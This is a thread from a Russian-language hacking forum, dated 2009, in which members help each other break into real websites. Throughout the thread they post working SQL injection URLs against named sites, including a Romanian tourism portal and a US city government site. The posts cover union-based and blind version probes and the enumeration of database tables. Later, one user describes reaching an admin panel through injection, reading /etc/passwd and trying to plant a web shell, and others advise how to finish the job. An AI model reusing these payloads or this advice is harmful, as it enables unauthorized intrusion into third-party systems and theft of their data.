Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Мде

    А мне кажется пятая
    http://www.phatbeats.co.uk/phatbeats-profile-detail.php?id=1+and+substring(version(),1,1)=5--+

    +++AndreyDevil+++
    Там двойной запрос

    а вторая отлично перебирается, просто кавычку нужно ставить
    http://www.higherhacknell.co.uk/recipes.php?id=-1'+union+select+1,2,concat_ws(0x3a,User(),Database(),Version()),4,5,6,7,8,9,0,11/*
     
  2. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    там процедура угадывай синтаксис
     
  3. VITАL

    VITАL Elder - Старейшина

    Joined:
    19 Aug 2008
    Messages:
    1
    Likes Received:
    25
    Reputations:
    10
    есть скуля... вроде. но что то не так
    поможете?)
     
    #5743 VITАL, 6 Mar 2009
    Last edited: 6 Mar 2009
  4. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    VITАL
    https://forum.antichat.ru/showpost.php?p=1152922&postcount=5810

    Тебе по 2 раза нужно отвечать? :)
     
  5. VITАL

    VITАL Elder - Старейшина

    Joined:
    19 Aug 2008
    Messages:
    1
    Likes Received:
    25
    Reputations:
    10
    jokester
    спасибо) не заметил... да там вижу нифига не получится.. а второй? хз... думаю тоже не выйдет
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.turisminromania.ro/evenimente~BUCURESTI~detalii~Concert-Ace-Of-Base~23+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64.html

    Великий Jokester помоги, вроде вывод есть а не выводит.Спасибо заранее.
     
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Всё, что больше одного символа, при попытке подставить значение (хоть 11 вместо 1) - вызывает ошибку.

    Пока только так вижу:

    http://www.turisminromania.ro/evenimente~BUCURESTI~detalii~Concert-Ace-Of-Base~23+and+substring(version(),1,1)=5.html
     
    1 person likes this.
  8. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Там рядом полноценная инъекция...

    Code:
    http://www.turisminromania.ro/index.php?judet=10+and+1=0+union+select+1,version(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49--
     
    3 people like this.
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    thanks to R1dex , разобрался

    надо спать больше, зациклился на одном и бошка дальше не думает...всем спасибо и спокойной ночи
     
    #5749 Gorev, 7 Mar 2009
    Last edited: 7 Mar 2009
  10. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Не в поле дело , а в общей длинне строки
    И эта ничем не хуже, просто ненужное надо убрать :)
    http://www.turisminromania.ro/evenimente~BUCURESTI~detalii~Concert-Ace-Of-Base~2+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+information_schema.tables.html
     
    #5750 Kakoytoxaker, 7 Mar 2009
    Last edited: 7 Mar 2009
    2 people like this.
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    гы, точняк. Просто с такого кол-ва полей неплохо экономица за счет урезания по одному символу с каждого числа. Риспект.
     
  12. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    что тут у нас такое?

    http://prescott-az.gov/news/index.php?id=1468+order+by+12/* - 12 типа..
    http://prescott-az.gov/news/index.php?id=1468+union+select+1,2,3,4,5,6,7,8,9,10,11,12/* а не работает...
     
  13. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Нету вывода.Юзай как слепую.
    Code:
    http://prescott-az.gov/news/index.php?id=1468+and+substring(version(),1,1)=4/*
     
    1 person likes this.
  14. serfertty

    serfertty Guest

    Reputations:
    0
    Вывода нет. Один запрос переходит в другой.
     
  15. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    вот именно, мы же не для феньки разбирали это всё)
    tables:
    & columns:
     
    3 people like this.
  16. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Ситуация.
    Получил доступ в админку, через аплоад картинок (другого нет) заливаю шелл (допустим shell.php).
    Скрипт меняет название шелла и расширение, на что то типа uploadimage.gif?3451
    когда обращаешься к этой картинке-в браузере показывается код шелла.Как получить нормальный шелл?
    Доступ в админку получил через скулю, файл прив пашет, могу прочитать /etc/passwd и ещё несколько.Но не знаю папку с правами на запись, поэтому через скулю залить шелл не могу.
    Выручайте!
     
  17. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Как понять "не знаю папку на запись" ?

    Лей в ту папку, куда из админки заливается твоя картинка, права должны быть
     
  18. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Я в неё и пробовал, нифига =(
     
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Так что ты хочешь услышать? Если скрипт меняет расширение файла при заливке, то ничего ты тут не сделаешь. Ищи папку на запись, и лей через скуль. Или ищи инклуд, и инклудь свой шелл
     
  20. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    Возможно картинка хранится в базе, а не в файловом варианте. И 3451 некий айди картинки вытаскивающий и показывающий ее. Второй вариант - от картинки обрезается расширение и настоящее имя ее вроде 3451.jpg ... Ну или много еще чего. Слишком размывчато все описал.
     
Thread Status:
Not open for further replies.